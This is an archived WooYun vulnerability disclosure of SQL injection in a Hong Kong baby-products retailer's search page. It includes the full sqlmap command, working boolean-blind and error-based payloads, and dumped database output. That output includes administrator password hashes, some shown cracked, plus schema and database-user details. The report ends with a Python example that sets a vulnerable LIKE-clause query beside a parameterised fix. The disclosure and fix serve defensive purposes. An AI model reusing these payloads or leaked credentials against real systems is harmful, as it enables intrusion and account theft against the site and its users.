WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-12-01: Details sent to the vendor; awaiting vendor handling
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and relevant domain experts
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public
Baby Country: SQL injection at one location (admin password leak)
URL: http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=
$ python sqlmap.py -u "http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=" -p searchkey --technique=BE --random-agent --batch -D hkbaby_pos -T t_user -C mName,mPassword,mTel,mEmail,mMobile_Phone --dump
Database: hkbaby_pos
Table: t_user
[6 entries]
+-------------------+---------------------------------------------+---------+---------+---------------+
| mName             | mPassword                                   | mTel    | mEmail  | mMobile_Phone |
+-------------------+---------------------------------------------+---------+---------+---------------+
| Administrator     | b8369ee75671dcdc385aa51b268d6c42            | NULL    | NULL    | NULL          |
| Administrator     | 6E4BA784DC5EB7D6004D5A241246D60F            | <blank> | <blank> | <blank>       |
| 101               | 38B3EFF8BAF56627478EC76A704E9B52 (101)      | <blank> | <blank> | <blank>       |
| 108               | A3C65C2974270FD093EE8A9BF8AE7D0B (108)      | <blank> | <blank> | <blank>       |
| Central Logistics | D41D8CD98F00B204E9800998ECF8427E ()         | <blank> | <blank> | <blank>       |
| 技術支援          | B911D003A4B0252F650671B38EAD7FB1 (pericles) | <blank> | <blank> | <blank>       |
+-------------------+---------------------------------------------+---------+---------+---------------+
---
Parameter: searchkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'hkbabywebsite@%'
current user is DBA: False
database management system users [1]:
[*] 'hkbabywebsite'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1495    |
| SESSION_VARIABLES                     | 512     |
| GLOBAL_VARIABLES                      | 497     |
| GLOBAL_STATUS                         | 403     |
| SESSION_STATUS                        | 403     |
| STATISTICS                            | 302     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| KEY_COLUMN_USAGE                      | 202     |
| PARTITIONS                            | 147     |
| TABLES                                | 147     |
| TABLE_CONSTRAINTS                     | 136     |
| PLUGINS                               | 46      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| SCHEMA_PRIVILEGES                     | 16      |
| ENGINES                               | 9       |
| INDEX_STATISTICS                      | 7       |
| TABLE_STATISTICS                      | 6       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: hkbaby_pos
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| t_product_tx                          | 3787    |
| t_invoice_detail                      | 2115    |
| t_product_stock                       | 1955    |
| t_invoice                             | 1340    |
| t_invoice_moneycurrency               | 1327    |
| t_invoice_paytype                     | 1327    |
| t_customer                            | 1322    |
| t_update                              | 1157    |
| t_product_barcode                     | 1001    |
| t_product                             | 829     |
| t_product_pricegroup                  | 805     |
| t_usergroup_right                     | 624     |
| log_info                              | 475     |
| t_supplier_invoice_in_detail          | 447     |
| t_trading_invoice_detail              | 443     |
| t_log                                 | 355     |
| t_trading_invoice                     | 171     |
| t_stock_adjustment_in_detail          | 162     |
| t_stocktake_detail                    | 162     |
| t_wishlist                            | 126     |
| t_brand                               | 91      |
| t_category                            | 75      |
| t_supplier_invoice_in                 | 74      |
| t_size                                | 22      |
| t_supplier                            | 21      |
| t_color                               | 16      |
| t_paytype                             | 8       |
| t_website                             | 7       |
| t_user                                | 6       |
| t_labelbarcode                        | 4       |
| t_usergroup                           | 4       |
| t_moneycurrency                       | 3       |
| t_stock                               | 3       |
| ad_right                              | 2       |
| t_groupdiscount                       | 2       |
| t_sc                                  | 2       |
| t_station                             | 2       |
| t_unit                                | 2       |
| t_company                             | 1       |
| t_stock_adjustment_in                 | 1       |
| t_stocktake                           | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hkbaby_pos
Table: t_company_onetimedicount
[1 column]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| mPassword | varchar(255) |
+-----------+--------------+
Database: hkbaby_pos
Table: t_company
[1 column]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| mFtp_Password | varchar(255) |
+---------------+--------------+
Database: hkbaby_pos
Table: t_user
[1 column]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| mPassword | varchar(255) |
+-----------+--------------+
Database: hkbaby_pos
Table: t_company
[1 entry]
+---------------+
| mFtp_Password |
+---------------+
| NULL          |
+---------------+
Database: hkbaby_pos
Table: t_user
[6 entries]
+---------------------------------------------+
| mPassword                                   |
+---------------------------------------------+
| 38B3EFF8BAF56627478EC76A704E9B52 (101)      |
| 6E4BA784DC5EB7D6004D5A241246D60F            |
| A3C65C2974270FD093EE8A9BF8AE7D0B (108)      |
| b8369ee75671dcdc385aa51b268d6c42            |
| B911D003A4B0252F650671B38EAD7FB1 (pericles) |
| D41D8CD98F00B204E9800998ECF8427E ()         |
+---------------------------------------------+
Database: hkbaby_pos
Table: t_company_onetimedicount
[0 entries]
+-----------+
| mPassword |
+-----------+
+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: hkbaby_pos
Table: t_user
[13 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| mAddress        | mediumtext   |
| mCode           | varchar(255) |
| mDepartment     | varchar(255) |
| mEmail          | varchar(255) |
| mFax            | varchar(255) |
| mMobile_Phone   | varchar(255) |
| mName           | varchar(255) |
| mNon_Active     | smallint(6)  |
| mPassword       | varchar(255) |
| mRemarks        | mediumtext   |
| mTel            | varchar(255) |
| mUserGroup_Code | varchar(255) |
| T_User_ID       | int(11)      |
+-----------------+--------------+
Fix: deploy a WAF.
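The payload shape sqlmap reported, %' AND ... AND '%'=', shows that searchkey is spliced into a LIKE '%...%' clause, which is what a WAF would only be screening for; the underlying fix is a parameterised query. The following is an added example, not code from the affected site (which runs PHP/MySQL): a Python/sqlite stand-in with constructed product rows that places that concatenation beside the parameterised form with LIKE-wildcard escaping. The table name t_product comes from the page's table listing; the column names and rows are assumed.

```python
import sqlite3

# Constructed stand-in for the product search. The real site ran PHP/MySQL;
# sqlite only approximates it, but the LIKE-clause splice behaves the same.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
    CREATE TABLE t_product (name TEXT, cat TEXT);
    INSERT INTO t_product VALUES ('Baby bottle', 'BtmC'),
                                 ('Teat set', 'BtmC'),
                                 ('Stroller', 'STR');
""")


def search_vulnerable(cat, searchkey):
    # The pattern the reported payload implies: the raw parameter is pasted
    # into LIKE '%...%', so a single quote in searchkey ends the string literal
    # and everything after it is parsed as SQL.
    sql = ("SELECT name FROM t_product WHERE cat = '%s' "
           "AND name LIKE '%%%s%%'" % (cat, searchkey))
    return [row[0] for row in CONN.execute(sql)]


def search_safe(cat, searchkey):
    # Bind both values as parameters so they are never parsed as SQL, and
    # escape LIKE metacharacters so '%' and '_' in the input match literally
    # instead of widening the search.
    escaped = (searchkey.replace("\\", "\\\\")
                        .replace("%", "\\%")
                        .replace("_", "\\_"))
    sql = ("SELECT name FROM t_product WHERE cat = ? "
           "AND name LIKE ? ESCAPE '\\'")
    return [row[0] for row in CONN.execute(sql, (cat, "%" + escaped + "%"))]


# Boolean-based blind payload as sqlmap listed it on this page, URL-decoded,
# plus its false twin: a blind oracle works because the two return different
# row sets from the vulnerable query.
PAYLOAD_TRUE = "%' AND 3158=3158 AND '%'='"
PAYLOAD_FALSE = "%' AND 3158=3159 AND '%'='"


def demo():
    return {
        "normal": search_vulnerable("BtmC", "bottle"),       # ['Baby bottle']
        "vuln_true": search_vulnerable("BtmC", PAYLOAD_TRUE),  # every BtmC row
        "vuln_false": search_vulnerable("BtmC", PAYLOAD_FALSE),  # []
        "safe_true": search_safe("BtmC", PAYLOAD_TRUE),      # [] (literal match)
        "safe_normal": search_safe("BtmC", "bottle"),        # ['Baby bottle']
    }
```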
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-12-01 16:21
Referred to related parties.
None yet.